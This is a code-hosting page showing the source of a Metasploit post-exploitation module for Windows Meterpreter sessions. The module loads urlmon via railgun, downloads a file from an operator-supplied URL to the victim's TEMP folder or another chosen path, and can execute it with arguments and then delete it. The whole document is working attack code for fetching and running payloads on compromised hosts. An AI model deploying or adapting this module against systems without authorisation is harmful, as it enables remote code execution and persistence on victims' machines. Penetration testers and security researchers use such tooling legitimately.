Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/download_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Windows Manage Download and/or Execute',13'Description' => %q{14This module will download a file by importing urlmon via railgun.15The user may also choose to execute the file with arguments via exec_string.16},17'License' => MSF_LICENSE,18'Platform' => ['win'],19'SessionTypes' => ['meterpreter'],20'Author' => ['RageLtMan <rageltman[at]sempervictus>'],21'Compat' => {22'Meterpreter' => {23'Commands' => %w[24stdapi_fs_delete_file25stdapi_fs_file_expand_path26stdapi_fs_stat27stdapi_railgun_api28stdapi_sys_config_getenv29]30}31}32)33)3435register_options(36[37OptString.new('URL', [true, 'Full URL of file to download' ]),38OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]),39OptString.new('FILENAME', [false, 'Name for downloaded file' ]),40OptBool.new('OUTPUT', [true, 'Show execution output', true ]),41OptBool.new('EXECUTE', [true, 'Execute file after completion', false ]),42]43)4445register_advanced_options(46[47OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),48OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),49OptBool.new('DELETE', [true, 'Delete file after execution', false ]),50]51)52end5354# Check to see if our dll is loaded, load and configure if not5556def add_railgun_urlmon57if client.railgun.libraries.find_all { |d| d.first == 'urlmon' }.empty?58session.railgun.add_dll('urlmon', 'urlmon')59session.railgun.add_function(60'urlmon', 'URLDownloadToFileW', 'DWORD',61[62['PBLOB', 'pCaller', 'in'],63['PWCHAR', 'szURL', 'in'],64['PWCHAR', 'szFileName', 'in'],65['DWORD', 'dwReserved', 'in'],66['PBLOB', 'lpfnCB', 'inout']67]68)69vprint_good('urlmon loaded and configured')70else71vprint_status('urlmon already loaded')72end73end7475def run76# Make sure we meet the requirements before running the script, note no need to return77# unless error78return 0 if session.type != 'meterpreter'7980# get time81strtime = Time.now8283# check/set vars84url = datastore['URL']85filename = datastore['FILENAME'] || url.split('/').last8687path = datastore['DOWNLOAD_PATH']88if path.blank?89path = session.sys.config.getenv('TEMP')90else91path = session.fs.file.expand_path(path)92end9394outpath = path + '\\' + filename95exec = datastore['EXECUTE']96exec_string = datastore['EXEC_STRING']97output = datastore['OUTPUT']98remove = datastore['DELETE']99100# set up railgun101add_railgun_urlmon102103# get our file104vprint_status("Downloading #{url} to #{outpath}")105client.railgun.urlmon.URLDownloadToFileW(nil, url, outpath, 0, nil)106107# check our results108begin109out = session.fs.file.stat(outpath)110print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ")111rescue StandardError112print_error('File not found. The download probably failed')113return114end115116# Execute file upon request117if exec118begin119cmd = "\"#{outpath}\" #{exec_string}"120121print_status("Executing file: #{cmd}")122res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])123print_good(res) if output && !res.empty?124rescue ::Exception => e125print_error("Unable to execute: #{e.message}")126end127end128129# remove file if needed130if remove131begin132print_status("Deleting #{outpath}")133session.fs.file.rm(outpath)134rescue ::Exception => e135print_error("Unable to remove file: #{e.message}")136end137end138end139end140141142